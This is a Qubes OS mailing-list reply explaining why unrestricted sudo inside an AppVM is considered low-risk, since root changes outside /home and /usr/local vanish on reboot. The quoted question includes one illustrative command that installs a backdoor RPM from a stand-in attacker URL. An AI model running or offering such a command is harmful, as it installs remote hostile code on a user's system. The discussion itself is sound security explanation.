On 03/11/2017 12:33 AM, [email protected] wrote: > Im sure this has been kicked into a pulp (considering the threads and > the text in the sudoers files) but I am still perturbed by the > argument that allowing unrestricted sudo to root in a DomU VM is > "safe" and there is "no benefit" to disallowing it. Perhaps I am > misunderstanding something, I have only installed and begun to pull > the system apart today, so bear with me. > [...] > This code could do something as comical as: > > sudo dnf install https://i.ownz.uk/muhbackdoorz.rpm > > I am having an extremely difficult time seeing how this is not an > issue. > Aaaaand there you have it, the problem! This command will not persist a reboot of the AppVM, because of the fake read-write rest of the filesystem: the only really read-write directories (their changes are actually persisted) are /home and /usr/local.
As the others already stated there could be problems for the actually running session, i.e. the rogue command could siphon all your data to a remote location, but it would be only able to access data in that AppVM and not the others. This action would not need any root access, because all data is from the very same user that downloaded/started the rogue program in the first place, so it already has access. The only advantage that root access would give could arguably be persistance (i.e. installation, as you suggested with DNF), but that advantage is fake and will vanish on AppVM reboot. -- Alex -- You received this message because you are subscribed to the Google Groups "qubes-users" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. To post to this group, send email to [email protected]. To view this discussion on the web visit https://groups.google.com/d/msgid/qubes-users/0cb0fb3a-a734-cb47-3167-681c971c6876%40gmx.com. For more options, visit https://groups.google.com/d/optout.
signature.asc
Description: OpenPGP digital signature
